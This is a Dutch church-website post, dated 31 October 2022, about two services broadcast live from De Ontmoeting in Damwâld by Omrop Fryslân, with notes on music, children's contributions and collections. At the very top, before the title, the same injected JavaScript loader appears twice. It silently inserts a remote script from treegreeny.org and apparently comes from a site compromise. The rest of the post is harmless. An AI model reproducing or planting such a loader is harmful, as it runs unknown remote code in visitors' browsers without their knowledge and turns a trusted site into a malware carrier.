;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tsjerketsjinsten Omrop Fryslân ... een groot genoegen! - PKN Damwâld

Tsjerketsjinsten Omrop Fryslân … een groot genoegen!

Gepubliceerd op: maandag 31 oktober 2022

De afgelopen twee zondagen waren de ochtenddiensten toch een beetje anders dan anders, want als Tsjerke fan de moanne werden de kerkdiensten live vanuit De Ontmoeting in Damwâld uitgezonden. Vanaf het moment dat het verzoek van de Raad van Kerken binnenkwam om Tsjerke fan de moanne te zijn is er nagedacht hoe dit vorm gegeven kon worden. Omrop Fryslân zendt rechtstreeks uit en dat vereist toch wel behoorlijk wat organisatie en de diensten kennen een wat andere opzet dan dat dat in onze beide PKN-kerken gebruikelijk is. Alhoewel beide diensten een andere voorganger hadden, ds. S. Boukes op 23 oktober en kerkelijk werker in Hantum dhr. Wiebe Feddema op 30 oktober, werd er gekozen voor vieringen die met elkaar in verbinding stonden door het bekende, maar bijzondere (levens-) verhaal van Abraham centraal te stellen. Beide diensten waren niet alleen zeer aansprekend te noemen, ook beide lectoren zorgden voor een inspirerende schriftlezingen in zowel het Nederlands als in het Fries. Bovendien viel er muzikaal veel te genieten. Organist Foeke Wiegersma, trompettist Eddy Huizenga en marimba-speler Hendrie Westra zorgden op 23 oktober voor een heerlijke muzikale omlijsting en op 30 oktober namen organist Margrietha Zagema en pianist Joop de Jong  op indrukwekkende wijze de honneurs waar.

Ook de kinderen van BLITS! (Bidde – Leauwen – Iepen – Trochjaan – Sjonge) hadden in beide diensten een prachtige bijdrage. Op 23 oktober maakte we kennis met Abraham die de sterren aan de hemel aan het tellen was. Gelukkig kon de kinderen daarbij goed helpen. Op 30 oktober  kregen we uitleg over ‘happystones’, die later in Damwâld zouden worden verspreid. De uitleg was volgens één van de kinderen eigenlijk wel duidelijk. Van ‘happystones’ wordt je namelijk ‘happy’.

Op 23 oktober werd er speciaal gecollecteerd voor World Servants Driezum/Wâlterswâld en voor de Wurkgroep Tsjerketsjinsten Fryslân. Op 30 oktober werd er in het bijzonder  gecollecteerd voor de Voedselbank Dantumadiel. Actiegroep Driezum – Wâlterswâld bouwt met World Servants aan verandering. In 2023 steekt deze actiegroep de handen uit de mouwen in Rwanda. Ze bouwen daar mee aan een kleuterschool. Daardoor verandert niet alleen het leven van de mensen daar, maar ook de jongeren zelf veranderen. Voedselbank Dantumadiel is in 2011 ontstaan uit een burgerinitiatief. Het wordt gerund door ongeveer 40 gemotiveerde vrijwilligers.  Men verstrekt – hoe actueel –  voedselhulp aan mensen die, voor een korte of langere periode, financieel de eindjes even niet meer goed aan elkaar kunnen knopen.

In beide diensten werd er ook gecollecteerd voor de Wurkgroep Tsjerketsjinsten Fryslân. De uitzendingen op Omrop Fryslân worden zeer gewaardeerd. Ook in 2022 gaan de uitzendingen door, iedere maand vanuit een andere kerk. Als u wilt bijdragen in de kosten van deze diensten en wilt meehelpen aan een voortzetting van de uitzendingen, kunt u een bijdrage overmaken naar het bankrekeningnummer dat speciaal hiervoor is geopend. Het bankrekeningnummer van de Wurkgroep:  IBAN: NL15 RABO 0373 7444 71 t.n.v. Raad van Kerken Fryslân.

Uiteraard is het een aanrader om de diensten nogmaals te bekijken:

Tsjerketsjinst 23 oktober

Tsjerketsjinst live Omrop Fryslân 23 oktober 2022

Tsjerketsjinst 30 oktober

Tsjerketsjinst live Omrop Fryslân 30 oktober 2022

Bronvermelding: foto’s en links zijn geplaatst met toestemming van Omrop Fryslân